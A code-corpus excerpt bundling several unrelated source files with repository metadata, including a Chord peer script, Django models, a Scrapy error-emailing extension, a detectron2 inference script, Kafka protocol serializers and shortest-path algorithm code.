t))) + np.dot(self.U_H, msin(self.Sigma_H * t)), self.V_H.T) return X_t def transport(self, Eta, X, H, t): tauEta = Eta - np.dot(np.dot(np.dot(X, self.V_H), msin(self.Sigma_H * t)) + np.dot(self.U_H, (np.eye(X.shape[1]) - mcos(self.Sigma_H * t))), np.dot(self.U_H.T, Eta)) return tauEta class GrassmannianSVDrank1(SpaceMeta): # see GROUSE method by Balzano et al. 
def __init__(self, m, k): self.u_H = np.zeros((m,)) self.alpha = 0 self.sigma_H = 0 self.v_H = np.zeros((k,)) self.beta = 0 def get_G(self, grad, X): G = (grad[0] - np.dot(X, np.dot(X.T, grad[0])), grad[1]) return G def get_H(self, G, gamma, tauH): H = (-G[0], G[1]) self.u_H = H[0] / np.linalg.norm(H[0]) self.v_H = H[1] / np.linalg.norm(H[1]) self.sigma_H = np.linalg.norm(H[0]) * np.linalg.norm(H[1]) return H def update_variable(self, X, H, t): X_t = X + np.outer((np.cos(self.sigma_H * t) - 1) * np.dot(X, self.v_H) + np.sin(self.sigma_H * t) * self.u_H, self.v_H) return X_t def transport(self, Eta, X, H, t): pass
en
0.709197
# this function returns the projected gradient # this function computes the search direction from the current projected gradient and the past search direction # this function updates the variable using the search direction and the step size # this function transports an element along H into the tangent space at distance t # see Edelman et al. # see GROUSE method by Balzano et al.
2.786428
3
ChordServer (alt.)/peer.py
hoanhan101/chord
1
6623558
<filename>ChordServer (alt.)/peer.py<gh_stars>1-10 #!/usr/bin/env python3 """ peer.py - A Peer acts as a Server and a Client Author: - <NAME> (<EMAIL>) - <NAME> (<EMAIL>) Date: 11/15/2017 """ import zerorpc from chord_instance import ChordInstance from const import * from utils import * from threading import Thread class Server(Thread): def __init__(self): Thread.__init__(self) def run(self): try: print("SERVER_THREAD IS RUNNING") s = zerorpc.Server(my_chord_instance) s.bind("tcp://{0}:{1}".format(my_IP, default_port)) s.run() except KeyboardInterrupt: print("Exit using KeyboardInterrupt") class Client(Thread): def __init__(self): Thread.__init__(self) def run(self): try: print("CLIENT_THREAD IS RUNNING") your_IP = input("Enter IP to join: ") c = zerorpc.Client() c.connect("tcp://{0}:{1}".format(your_IP, default_port)) if c.is_alive(): instance_list = deserialize(c.get_instance_list()) # append to a local list and join the first instance (can be anyone in the list) instance_list.append(my_chord_instance) my_chord_instance.join(instance_list[0]) # update the instance list locally my_chord_instance.set_instance_list(serialize(instance_list)) # update other instance list using RPC as well for instance in my_chord_instance.instance_list: if instance.IP_ADDRESS != my_IP: temp_client = zerorpc.Client() temp_client.connect("tcp://{0}:{1}".format(instance.IP_ADDRESS, default_port)) temp_client.set_instance_list(serialize(instance_list)) except KeyboardInterrupt: print("Exit using KeyboardInterrupt") if __name__ == '__main__': my_IP = get_my_IP() # temporary instance list, use to startup a chord instance # real instance list is an attribute in chord instance instance_list = [] my_chord_instance = ChordInstance(my_IP, default_port) instance_list.append(my_chord_instance) server = Server() client = Client() server.start() client.start()
<filename>ChordServer (alt.)/peer.py<gh_stars>1-10 #!/usr/bin/env python3 """ peer.py - A Peer acts as a Server and a Client Author: - <NAME> (<EMAIL>) - <NAME> (<EMAIL>) Date: 11/15/2017 """ import zerorpc from chord_instance import ChordInstance from const import * from utils import * from threading import Thread class Server(Thread): def __init__(self): Thread.__init__(self) def run(self): try: print("SERVER_THREAD IS RUNNING") s = zerorpc.Server(my_chord_instance) s.bind("tcp://{0}:{1}".format(my_IP, default_port)) s.run() except KeyboardInterrupt: print("Exit using KeyboardInterrupt") class Client(Thread): def __init__(self): Thread.__init__(self) def run(self): try: print("CLIENT_THREAD IS RUNNING") your_IP = input("Enter IP to join: ") c = zerorpc.Client() c.connect("tcp://{0}:{1}".format(your_IP, default_port)) if c.is_alive(): instance_list = deserialize(c.get_instance_list()) # append to a local list and join the first instance (can be anyone in the list) instance_list.append(my_chord_instance) my_chord_instance.join(instance_list[0]) # update the instance list locally my_chord_instance.set_instance_list(serialize(instance_list)) # update other instance list using RPC as well for instance in my_chord_instance.instance_list: if instance.IP_ADDRESS != my_IP: temp_client = zerorpc.Client() temp_client.connect("tcp://{0}:{1}".format(instance.IP_ADDRESS, default_port)) temp_client.set_instance_list(serialize(instance_list)) except KeyboardInterrupt: print("Exit using KeyboardInterrupt") if __name__ == '__main__': my_IP = get_my_IP() # temporary instance list, use to startup a chord instance # real instance list is an attribute in chord instance instance_list = [] my_chord_instance = ChordInstance(my_IP, default_port) instance_list.append(my_chord_instance) server = Server() client = Client() server.start() client.start()
en
0.753508
#!/usr/bin/env python3 peer.py - A Peer acts as a Server and a Client Author: - <NAME> (<EMAIL>) - <NAME> (<EMAIL>) Date: 11/15/2017 # append to a local list and join the first instance (can be anyone in the list) # update the instance list locally # update other instance list using RPC as well # temporary instance list, use to startup a chord instance # real instance list is an attribute in chord instance
2.950428
3
ap/models.py
edithamadi/Awwwards
0
6623559
<reponame>edithamadi/Awwwards<gh_stars>0 from django.db import models from django.contrib.auth.models import User # Create your models here. class Projects(models.Model): user = models.OneToOneField(User, on_delete=models.CASCADE,primary_key = True) title = models.TextField(max_length = 20, default="title here") landing_page_image = models.ImageField(upload_to = 'images/') description = models.TextField() # link_to_live_site = models.URLField(max_length=250,default = ) def __str__(self): return self.user.username def save_projects(self): self.save() def delete_projects(self): self.delete() @classmethod def search_projects(cls , search_term): projects = cls.objects.filter( first_name__icontains = search_term ) return projects class Profile(models.Model): user = models.OneToOneField(User, on_delete=models.CASCADE,primary_key = True) first_name = models.CharField(max_length=30) last_name = models.CharField(max_length=30) profile_photo = models.ImageField(upload_to='profile/') bio = models.CharField(max_length=200) projects = models.ForeignKey(Projects, null=True) user_contact_info=models.IntegerField(default=0) def __str__(self): return self.user.username def save_profile(self): self.save() def delete_profile(self): self.delete() @classmethod def search_profile(cls , search_term): profiles = cls.objects.filter( first_name__icontains = search_term ) return profiles
from django.db import models from django.contrib.auth.models import User # Create your models here. class Projects(models.Model): user = models.OneToOneField(User, on_delete=models.CASCADE,primary_key = True) title = models.TextField(max_length = 20, default="title here") landing_page_image = models.ImageField(upload_to = 'images/') description = models.TextField() # link_to_live_site = models.URLField(max_length=250,default = ) def __str__(self): return self.user.username def save_projects(self): self.save() def delete_projects(self): self.delete() @classmethod def search_projects(cls , search_term): projects = cls.objects.filter( first_name__icontains = search_term ) return projects class Profile(models.Model): user = models.OneToOneField(User, on_delete=models.CASCADE,primary_key = True) first_name = models.CharField(max_length=30) last_name = models.CharField(max_length=30) profile_photo = models.ImageField(upload_to='profile/') bio = models.CharField(max_length=200) projects = models.ForeignKey(Projects, null=True) user_contact_info=models.IntegerField(default=0) def __str__(self): return self.user.username def save_profile(self): self.save() def delete_profile(self): self.delete() @classmethod def search_profile(cls , search_term): profiles = cls.objects.filter( first_name__icontains = search_term ) return profiles
en
0.374589
# Create your models here. # link_to_live_site = models.URLField(max_length=250,default = )
2.308125
2
nrc/nrc/extensions/failLogger.py
SkyTruth/scraper
2
6623560
import StringIO from datetime import datetime import smtplib import traceback from scrapy import signals from scrapy import log from nrc import settings class FailLogger(object): @classmethod def from_crawler(cls, crawler): ext = cls() crawler.signals.connect(ext.spider_error, signal=signals.spider_error) crawler.signals.connect(ext.spider_close, signal=signals.spider_closed) return ext def spider_error(self, failure, response, spider): spider.exception_count += 1 if spider.exception_count == 1: # email on first exception temp = StringIO.StringIO() temp.write("Uncaught exception from {0}:\n\t{1}\n\n" .format(spider.name, failure.getErrorMessage())) failure.printTraceback(file=temp) message = temp.getvalue() self.send_error_email (spider, message, failure) temp.close() def spider_close(self, spider, reason): if spider.exception_count > 1: message = ("Total of %s uncaught exceptions in %s execution." % (spider.exception_count, spider.name)) self.send_error_email (spider, message) @staticmethod def report_exception(spider, e, srcmsg=""): spider.exception_count += 1 if spider.exception_count == 1: msg = ("{0}\nUncaught exception from {1}:\n\t{2}\n\n{3}" .format(srcmsg, spider.name, e, traceback.format_exc())) FailLogger.send_error_email (spider, msg, e) @staticmethod def send_error_email (spider, message, failure=None): if isinstance(failure, Exception): subject = ('%s Exception: %s' % (spider.name, failure)) elif failure: subject = ('%s Exception: %s' % (spider.name, failure.getErrorMessage())) else: subject = '%s: %s Exceptions' % (spider.name, spider.exception_count) spider.log ('Sending alert:\n\t%s' % (subject,), log.ERROR) senddate = datetime.strftime(datetime.now(), '%Y-%m-%d') header = ("Date: %s\r\nFrom: %s\r\nTo: %s\r\nSubject: %s\r\n\r\n" % (senddate, settings.MAIL_FROM, settings.MAIL_TO, subject)) server = smtplib.SMTP('%s:%s' % (settings.MAIL_HOST, settings.MAIL_PORT)) server.starttls() server.login(settings.MAIL_USER, settings.MAIL_PASS) 
server.sendmail(settings.MAIL_FROM, settings.MAIL_TO, header+message) server.quit()
import StringIO from datetime import datetime import smtplib import traceback from scrapy import signals from scrapy import log from nrc import settings class FailLogger(object): @classmethod def from_crawler(cls, crawler): ext = cls() crawler.signals.connect(ext.spider_error, signal=signals.spider_error) crawler.signals.connect(ext.spider_close, signal=signals.spider_closed) return ext def spider_error(self, failure, response, spider): spider.exception_count += 1 if spider.exception_count == 1: # email on first exception temp = StringIO.StringIO() temp.write("Uncaught exception from {0}:\n\t{1}\n\n" .format(spider.name, failure.getErrorMessage())) failure.printTraceback(file=temp) message = temp.getvalue() self.send_error_email (spider, message, failure) temp.close() def spider_close(self, spider, reason): if spider.exception_count > 1: message = ("Total of %s uncaught exceptions in %s execution." % (spider.exception_count, spider.name)) self.send_error_email (spider, message) @staticmethod def report_exception(spider, e, srcmsg=""): spider.exception_count += 1 if spider.exception_count == 1: msg = ("{0}\nUncaught exception from {1}:\n\t{2}\n\n{3}" .format(srcmsg, spider.name, e, traceback.format_exc())) FailLogger.send_error_email (spider, msg, e) @staticmethod def send_error_email (spider, message, failure=None): if isinstance(failure, Exception): subject = ('%s Exception: %s' % (spider.name, failure)) elif failure: subject = ('%s Exception: %s' % (spider.name, failure.getErrorMessage())) else: subject = '%s: %s Exceptions' % (spider.name, spider.exception_count) spider.log ('Sending alert:\n\t%s' % (subject,), log.ERROR) senddate = datetime.strftime(datetime.now(), '%Y-%m-%d') header = ("Date: %s\r\nFrom: %s\r\nTo: %s\r\nSubject: %s\r\n\r\n" % (senddate, settings.MAIL_FROM, settings.MAIL_TO, subject)) server = smtplib.SMTP('%s:%s' % (settings.MAIL_HOST, settings.MAIL_PORT)) server.starttls() server.login(settings.MAIL_USER, settings.MAIL_PASS) 
server.sendmail(settings.MAIL_FROM, settings.MAIL_TO, header+message) server.quit()
en
0.726257
# email on first exception
2.392714
2
src/inference.py
aidotse/d2seabirds
0
6623561
# Some basic setup: import torch, torchvision # Setup detectron2 logger import detectron2 from detectron2.utils.logger import setup_logger setup_logger() # import some common libraries import numpy as np import os, json, cv2, random from skimage.io import imread from skimage.segmentation import mark_boundaries from skimage.measure import label, regionprops, find_contours # import some common detectron2 utilities from detectron2 import model_zoo from detectron2.engine import DefaultPredictor from detectron2.config import get_cfg from detectron2.utils.visualizer import Visualizer from detectron2.data import MetadataCatalog, DatasetCatalog, build_detection_test_loader import pycocotools from PIL import Image, ImageDraw import numpy as np import ipdb from detectron2.structures import BoxMode from detectron2.engine import DefaultTrainer import detectron2.data.transforms as T from detectron2.data import DatasetMapper import re from detectron2.evaluation import COCOEvaluator, inference_on_dataset # Only one sequence will be considered. Just one video. 
# Paths with multiple images parent_annotation_path="/home/juan.vallado/data/YoutubeVIS/train/Annotations/" parent_image_path="/home/juan.vallado/data/YoutubeVIS/train/JPEGImages/" output_dir = "/home/appuser/output" # Get datasets dataset1 = os.listdir('/home/appuser/output')[0] dataset2 = os.listdir('/home/appuser/output')[1] datasets = [dataset1, dataset2] def get_youtube_dicts(img_dir, mask_dir): id = 0 data = [] for image in os.listdir(img_dir): #if id == 0: # record['annotations']=[] mask_path = os.path.join(mask_dir, "{}.png".format(image[:-4])) im=Image.open(mask_path) record = {} record['file_name']=os.path.join(img_dir, image) record['image_id']=id record['height']=im.size[1] record['width']=im.size[0] ann = {} objects = list(np.unique(np.asarray(im))) stuff = [] for i in objects[1:]: ann['bbox']=extract_bboxes(np.where(np.asarray(im, order="F")==i, i, 0), im) ann['bbox_mode']=BoxMode.XYWH_ABS #ipdb.set_trace() ann['segmentation']=pycocotools.mask.encode( \ np.asfortranarray( \ np.where(np.asarray(im, order="F")==i, i, 0) \ .astype(np.uint8) ) ) ann['category_id']=0 stuff.append(ann) ann={} record['annotations']=stuff data.append(record) segm = [] id = id+1 return data def extract_bboxes(arr, im): # Extract class props = regionprops(arr) assert len(props) == 1, "Error: Expected one mask, but got {}".format(len(props)) assert props[0].area > 0, "Error: Area of mask is <0!" 
rmin, cmin, rmax, cmax=props[0].bbox return [float(cmin), float(rmin), float(cmax-cmin), float(rmax-rmin)] #return props[0].bbox def register(annotation_path, image_path, name): for d in ["train", "test"]: DatasetCatalog.register("ytvis_{}_".format(name) + d, lambda d=d: get_youtube_dicts("{0}/{1}".format(image_path, d), "{0}/{1}".format(annotation_path, d))) MetadataCatalog.get("ytvis_{}_".format(name) + d).thing_classes = ["target"] # Register datasets def register_datasets(): cfg = get_cfg() for dataset in datasets: cfg.merge_from_file("/home/appuser/output/{}/config.yaml".format(dataset)) if cfg.MODEL.BACKBONE.FREEZE_AT == 2: # BL model annotation_path = os.path.join(parent_annotation_path, dataset) image_path = os.path.join(parent_image_path, dataset) register(annotation_path, image_path, "bl") else: annotation_path = os.path.join(parent_annotation_path, dataset) image_path = os.path.join(parent_image_path, dataset) register(annotation_path, image_path, "tl") # Declare model and prepare weights for inference cfg = get_cfg() cfg.merge_from_file("/home/appuser/output/{}/config.yaml".format(dataset)) cfg.MODEL.WEIGHTS = os.path.join("/home/appuser/output/{}".format(dataset), "model_final.pth") # path to the model we just trained cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.7 # set a custom testing threshold #ipdb.set_trace() return cfg # Prueba cfg = register_datasets() from detectron2.utils.visualizer import ColorMode predictor = DefaultPredictor(cfg) # Results for first dataset evaluator = COCOEvaluator("ytvis_bl_test", cfg, False, output_dir) val_loader = build_detection_test_loader(cfg, "ytvis_bl_test") inference_on_dataset(predictor.model, val_loader, evaluator) # Results for second dataset evaluator = COCOEvaluator("ytvis_tl_test", cfg, False, output_dir) val_loader = build_detection_test_loader(cfg, "ytvis_tl_test") inference_on_dataset(predictor.model, val_loader, evaluator) dataset_dicts_tl = DatasetCatalog.get("ytvis_tl_test") ytvis_metadata_tl = 
MetadataCatalog.get("ytvis_tl_train") dataset_dicts_bl = DatasetCatalog.get("ytvis_bl_test") ytvis_metadata_bl = MetadataCatalog.get("ytvis_bl_train") #Save images from tl model imgs = [] for d in random.sample(dataset_dicts_tl, 3): im = cv2.imread(d["file_name"]) outputs = predictor(im) # format is documented at https://detectron2.readthedocs.io/tutorials/models.html#model-output-format v = Visualizer(im[:, :, ::-1], metadata=ytvis_metadata_tl, scale=0.5, instance_mode=ColorMode.IMAGE_BW # remove the colors of unsegmented pixels. This option is only available for segmentation models ) out = v.draw_instance_predictions(outputs["instances"].to("cpu")) imgs.append(out.get_image()[:, :, ::-1]) for i in range (0, len(imgs)): cv2.imwrite("output/{}tl.jpg".format(i), imgs[i]) #Save images from bl model imgs = [] for d in random.sample(dataset_dicts_bl, 3): im = cv2.imread(d["file_name"]) outputs = predictor(im) # format is documented at https://detectron2.readthedocs.io/tutorials/models.html#model-output-format v = Visualizer(im[:, :, ::-1], metadata=ytvis_metadata_bl, scale=0.5, instance_mode=ColorMode.IMAGE_BW # remove the colors of unsegmented pixels. This option is only available for segmentation models ) out = v.draw_instance_predictions(outputs["instances"].to("cpu")) imgs.append(out.get_image()[:, :, ::-1]) for i in range (0, len(imgs)): cv2.imwrite("output/{}bl.jpg".format(i), imgs[i])
# Some basic setup: import torch, torchvision # Setup detectron2 logger import detectron2 from detectron2.utils.logger import setup_logger setup_logger() # import some common libraries import numpy as np import os, json, cv2, random from skimage.io import imread from skimage.segmentation import mark_boundaries from skimage.measure import label, regionprops, find_contours # import some common detectron2 utilities from detectron2 import model_zoo from detectron2.engine import DefaultPredictor from detectron2.config import get_cfg from detectron2.utils.visualizer import Visualizer from detectron2.data import MetadataCatalog, DatasetCatalog, build_detection_test_loader import pycocotools from PIL import Image, ImageDraw import numpy as np import ipdb from detectron2.structures import BoxMode from detectron2.engine import DefaultTrainer import detectron2.data.transforms as T from detectron2.data import DatasetMapper import re from detectron2.evaluation import COCOEvaluator, inference_on_dataset # Only one sequence will be considered. Just one video. 
# Paths with multiple images parent_annotation_path="/home/juan.vallado/data/YoutubeVIS/train/Annotations/" parent_image_path="/home/juan.vallado/data/YoutubeVIS/train/JPEGImages/" output_dir = "/home/appuser/output" # Get datasets dataset1 = os.listdir('/home/appuser/output')[0] dataset2 = os.listdir('/home/appuser/output')[1] datasets = [dataset1, dataset2] def get_youtube_dicts(img_dir, mask_dir): id = 0 data = [] for image in os.listdir(img_dir): #if id == 0: # record['annotations']=[] mask_path = os.path.join(mask_dir, "{}.png".format(image[:-4])) im=Image.open(mask_path) record = {} record['file_name']=os.path.join(img_dir, image) record['image_id']=id record['height']=im.size[1] record['width']=im.size[0] ann = {} objects = list(np.unique(np.asarray(im))) stuff = [] for i in objects[1:]: ann['bbox']=extract_bboxes(np.where(np.asarray(im, order="F")==i, i, 0), im) ann['bbox_mode']=BoxMode.XYWH_ABS #ipdb.set_trace() ann['segmentation']=pycocotools.mask.encode( \ np.asfortranarray( \ np.where(np.asarray(im, order="F")==i, i, 0) \ .astype(np.uint8) ) ) ann['category_id']=0 stuff.append(ann) ann={} record['annotations']=stuff data.append(record) segm = [] id = id+1 return data def extract_bboxes(arr, im): # Extract class props = regionprops(arr) assert len(props) == 1, "Error: Expected one mask, but got {}".format(len(props)) assert props[0].area > 0, "Error: Area of mask is <0!" 
rmin, cmin, rmax, cmax=props[0].bbox return [float(cmin), float(rmin), float(cmax-cmin), float(rmax-rmin)] #return props[0].bbox def register(annotation_path, image_path, name): for d in ["train", "test"]: DatasetCatalog.register("ytvis_{}_".format(name) + d, lambda d=d: get_youtube_dicts("{0}/{1}".format(image_path, d), "{0}/{1}".format(annotation_path, d))) MetadataCatalog.get("ytvis_{}_".format(name) + d).thing_classes = ["target"] # Register datasets def register_datasets(): cfg = get_cfg() for dataset in datasets: cfg.merge_from_file("/home/appuser/output/{}/config.yaml".format(dataset)) if cfg.MODEL.BACKBONE.FREEZE_AT == 2: # BL model annotation_path = os.path.join(parent_annotation_path, dataset) image_path = os.path.join(parent_image_path, dataset) register(annotation_path, image_path, "bl") else: annotation_path = os.path.join(parent_annotation_path, dataset) image_path = os.path.join(parent_image_path, dataset) register(annotation_path, image_path, "tl") # Declare model and prepare weights for inference cfg = get_cfg() cfg.merge_from_file("/home/appuser/output/{}/config.yaml".format(dataset)) cfg.MODEL.WEIGHTS = os.path.join("/home/appuser/output/{}".format(dataset), "model_final.pth") # path to the model we just trained cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.7 # set a custom testing threshold #ipdb.set_trace() return cfg # Prueba cfg = register_datasets() from detectron2.utils.visualizer import ColorMode predictor = DefaultPredictor(cfg) # Results for first dataset evaluator = COCOEvaluator("ytvis_bl_test", cfg, False, output_dir) val_loader = build_detection_test_loader(cfg, "ytvis_bl_test") inference_on_dataset(predictor.model, val_loader, evaluator) # Results for second dataset evaluator = COCOEvaluator("ytvis_tl_test", cfg, False, output_dir) val_loader = build_detection_test_loader(cfg, "ytvis_tl_test") inference_on_dataset(predictor.model, val_loader, evaluator) dataset_dicts_tl = DatasetCatalog.get("ytvis_tl_test") ytvis_metadata_tl = 
MetadataCatalog.get("ytvis_tl_train") dataset_dicts_bl = DatasetCatalog.get("ytvis_bl_test") ytvis_metadata_bl = MetadataCatalog.get("ytvis_bl_train") #Save images from tl model imgs = [] for d in random.sample(dataset_dicts_tl, 3): im = cv2.imread(d["file_name"]) outputs = predictor(im) # format is documented at https://detectron2.readthedocs.io/tutorials/models.html#model-output-format v = Visualizer(im[:, :, ::-1], metadata=ytvis_metadata_tl, scale=0.5, instance_mode=ColorMode.IMAGE_BW # remove the colors of unsegmented pixels. This option is only available for segmentation models ) out = v.draw_instance_predictions(outputs["instances"].to("cpu")) imgs.append(out.get_image()[:, :, ::-1]) for i in range (0, len(imgs)): cv2.imwrite("output/{}tl.jpg".format(i), imgs[i]) #Save images from bl model imgs = [] for d in random.sample(dataset_dicts_bl, 3): im = cv2.imread(d["file_name"]) outputs = predictor(im) # format is documented at https://detectron2.readthedocs.io/tutorials/models.html#model-output-format v = Visualizer(im[:, :, ::-1], metadata=ytvis_metadata_bl, scale=0.5, instance_mode=ColorMode.IMAGE_BW # remove the colors of unsegmented pixels. This option is only available for segmentation models ) out = v.draw_instance_predictions(outputs["instances"].to("cpu")) imgs.append(out.get_image()[:, :, ::-1]) for i in range (0, len(imgs)): cv2.imwrite("output/{}bl.jpg".format(i), imgs[i])
en
0.738856
# Some basic setup: # Setup detectron2 logger # import some common libraries # import some common detectron2 utilities # Only one sequence will be considered. Just one video. # Paths with multiple images # Get datasets #if id == 0: # record['annotations']=[] #ipdb.set_trace() # Extract class #return props[0].bbox # Register datasets # BL model # Declare model and prepare weights for inference # path to the model we just trained # set a custom testing threshold #ipdb.set_trace() # Prueba # Results for first dataset # Results for second dataset #Save images from tl model # format is documented at https://detectron2.readthedocs.io/tutorials/models.html#model-output-format # remove the colors of unsegmented pixels. This option is only available for segmentation models #Save images from bl model # format is documented at https://detectron2.readthedocs.io/tutorials/models.html#model-output-format # remove the colors of unsegmented pixels. This option is only available for segmentation models
2.113851
2
aioscrapy/middleware/middleware_extension.py
conlin-huang/aio-scrapy
13
6623562
<reponame>conlin-huang/aio-scrapy """ The Extension Manager See documentation in docs/topics/extensions.rst """ from .middleware import MiddlewareManager from scrapy.utils.conf import build_component_list class ExtensionManager(MiddlewareManager): component_name = 'extension' @classmethod def _get_mwlist_from_settings(cls, settings): return build_component_list(settings.getwithbase('EXTENSIONS'))
""" The Extension Manager See documentation in docs/topics/extensions.rst """ from .middleware import MiddlewareManager from scrapy.utils.conf import build_component_list class ExtensionManager(MiddlewareManager): component_name = 'extension' @classmethod def _get_mwlist_from_settings(cls, settings): return build_component_list(settings.getwithbase('EXTENSIONS'))
en
0.494707
The Extension Manager See documentation in docs/topics/extensions.rst
1.613875
2
esque_wire/protocol/serializers/api/controlled_shutdown_response.py
real-digital/esque-wire
0
6623563
<gh_stars>0 ############################################################### # Autogenerated module. Please don't modify. # # Edit according file in protocol_generator/templates instead # ############################################################### from typing import Dict from ...structs.api.controlled_shutdown_response import ControlledShutdownResponseData, RemainingPartition from ._main_serializers import ( ArraySerializer, ClassSerializer, Schema, errorCodeSerializer, int32Serializer, stringSerializer, ) remainingPartitionSchemas: Dict[int, Schema] = { 0: [("topic_name", stringSerializer), ("partition_index", int32Serializer)], 1: [("topic_name", stringSerializer), ("partition_index", int32Serializer)], 2: [("topic_name", stringSerializer), ("partition_index", int32Serializer)], } remainingPartitionSerializers: Dict[int, ClassSerializer[RemainingPartition]] = { version: ClassSerializer(RemainingPartition, schema) for version, schema in remainingPartitionSchemas.items() } remainingPartitionSerializers[-1] = remainingPartitionSerializers[2] controlledShutdownResponseDataSchemas: Dict[int, Schema] = { 0: [ ("error_code", errorCodeSerializer), ("remaining_partitions", ArraySerializer(remainingPartitionSerializers[0])), ], 1: [ ("error_code", errorCodeSerializer), ("remaining_partitions", ArraySerializer(remainingPartitionSerializers[1])), ], 2: [ ("error_code", errorCodeSerializer), ("remaining_partitions", ArraySerializer(remainingPartitionSerializers[2])), ], } controlledShutdownResponseDataSerializers: Dict[int, ClassSerializer[ControlledShutdownResponseData]] = { version: ClassSerializer(ControlledShutdownResponseData, schema) for version, schema in controlledShutdownResponseDataSchemas.items() } controlledShutdownResponseDataSerializers[-1] = controlledShutdownResponseDataSerializers[2]
############################################################### # Autogenerated module. Please don't modify. # # Edit according file in protocol_generator/templates instead # ############################################################### from typing import Dict from ...structs.api.controlled_shutdown_response import ControlledShutdownResponseData, RemainingPartition from ._main_serializers import ( ArraySerializer, ClassSerializer, Schema, errorCodeSerializer, int32Serializer, stringSerializer, ) remainingPartitionSchemas: Dict[int, Schema] = { 0: [("topic_name", stringSerializer), ("partition_index", int32Serializer)], 1: [("topic_name", stringSerializer), ("partition_index", int32Serializer)], 2: [("topic_name", stringSerializer), ("partition_index", int32Serializer)], } remainingPartitionSerializers: Dict[int, ClassSerializer[RemainingPartition]] = { version: ClassSerializer(RemainingPartition, schema) for version, schema in remainingPartitionSchemas.items() } remainingPartitionSerializers[-1] = remainingPartitionSerializers[2] controlledShutdownResponseDataSchemas: Dict[int, Schema] = { 0: [ ("error_code", errorCodeSerializer), ("remaining_partitions", ArraySerializer(remainingPartitionSerializers[0])), ], 1: [ ("error_code", errorCodeSerializer), ("remaining_partitions", ArraySerializer(remainingPartitionSerializers[1])), ], 2: [ ("error_code", errorCodeSerializer), ("remaining_partitions", ArraySerializer(remainingPartitionSerializers[2])), ], } controlledShutdownResponseDataSerializers: Dict[int, ClassSerializer[ControlledShutdownResponseData]] = { version: ClassSerializer(ControlledShutdownResponseData, schema) for version, schema in controlledShutdownResponseDataSchemas.items() } controlledShutdownResponseDataSerializers[-1] = controlledShutdownResponseDataSerializers[2]
de
0.58148
############################################################### # Autogenerated module. Please don't modify. # # Edit according file in protocol_generator/templates instead # ###############################################################
1.516159
2
s3/py/dijkstra2.py
lisiynos/lisiynos.github.io
1
6623564
<gh_stars>1-10 # -*- utf-8 -*- # <NAME> from tkinter import Pack N, M, start = map(int, input().split()) E = [] * N for i in range(M): f, t, w = map(int, input().split()) # Неориентированный граф E[f].append((t, w)) E[t].append((f, w)) INF = 10 ** 10 # Бесконечность d = [INF] * N # Кратчайшее расстояние до первой вершины Colored = [False] * N # Когда нашли кратчайший путь -> красим вершину Path = [-1] * N # Предыдущая вершина add = start min_d = 0 while min_d != INF: # Добавляем новую вершину Colored[add] = True d[add] = min_d # Пересчитываем пути через вершину add for t, w in E[add]: if d[add] + w < d[t]: d[t] = d[add] + w Path[t] = add # Ищем минимум min_d = INF for i in range(N): if not Colored[i] and d[i] < min_d: min_d = d[i] add = i # Трёхмерная динамика во Флойде # [k][i][j] - используя вершины с 1-ой по k-ую d = [[[0] * (N + 1) for i in range(N + 1)] for j in range(N + 1)] for k in range(1, N + 1): for i in range(1, N + 1): for j in range(1, N + 1): d[k][i][j] = min(d[k - 1][i][j], d[k - 1][i][k] + d[k - 1][k][j]) # Сведение к квадратной матрице F = [[0] * (N + 1) for i in range(N + 1)] for k in range(1, N + 1): for i in range(1, N + 1): for j in range(1, N + 1): F[i][j] = min(F[i][j], F[i][k] + F[k][j]) # Флойд с восстановлением пути F = [[0] * (N + 1) for i in range(N + 1)] prev = [list(range(N + 1)) for i in range(N + 1)] for k in range(1, N + 1): for i in range(1, N + 1): for j in range(1, N + 1): if F[i][k] + F[k][j] < F[i][j]: F[i][j] = F[i][k] + F[k][j] prev[i][j] = prev[k][j] def show_path(i, j): k = prev[i][j] if k == i: print(i, end=' ') return show_path(i, k) show_path(k, j)
# -*- utf-8 -*- # <NAME> from tkinter import Pack N, M, start = map(int, input().split()) E = [] * N for i in range(M): f, t, w = map(int, input().split()) # Неориентированный граф E[f].append((t, w)) E[t].append((f, w)) INF = 10 ** 10 # Бесконечность d = [INF] * N # Кратчайшее расстояние до первой вершины Colored = [False] * N # Когда нашли кратчайший путь -> красим вершину Path = [-1] * N # Предыдущая вершина add = start min_d = 0 while min_d != INF: # Добавляем новую вершину Colored[add] = True d[add] = min_d # Пересчитываем пути через вершину add for t, w in E[add]: if d[add] + w < d[t]: d[t] = d[add] + w Path[t] = add # Ищем минимум min_d = INF for i in range(N): if not Colored[i] and d[i] < min_d: min_d = d[i] add = i # Трёхмерная динамика во Флойде # [k][i][j] - используя вершины с 1-ой по k-ую d = [[[0] * (N + 1) for i in range(N + 1)] for j in range(N + 1)] for k in range(1, N + 1): for i in range(1, N + 1): for j in range(1, N + 1): d[k][i][j] = min(d[k - 1][i][j], d[k - 1][i][k] + d[k - 1][k][j]) # Сведение к квадратной матрице F = [[0] * (N + 1) for i in range(N + 1)] for k in range(1, N + 1): for i in range(1, N + 1): for j in range(1, N + 1): F[i][j] = min(F[i][j], F[i][k] + F[k][j]) # Флойд с восстановлением пути F = [[0] * (N + 1) for i in range(N + 1)] prev = [list(range(N + 1)) for i in range(N + 1)] for k in range(1, N + 1): for i in range(1, N + 1): for j in range(1, N + 1): if F[i][k] + F[k][j] < F[i][j]: F[i][j] = F[i][k] + F[k][j] prev[i][j] = prev[k][j] def show_path(i, j): k = prev[i][j] if k == i: print(i, end=' ') return show_path(i, k) show_path(k, j)
ru
0.991109
# -*- utf-8 -*- # <NAME> # Неориентированный граф # Бесконечность # Кратчайшее расстояние до первой вершины # Когда нашли кратчайший путь -> красим вершину # Предыдущая вершина # Добавляем новую вершину # Пересчитываем пути через вершину add # Ищем минимум # Трёхмерная динамика во Флойде # [k][i][j] - используя вершины с 1-ой по k-ую # Сведение к квадратной матрице # Флойд с восстановлением пути
2.776426
3
pyclitr.py
jrenslin/pyclitr
0
6623565
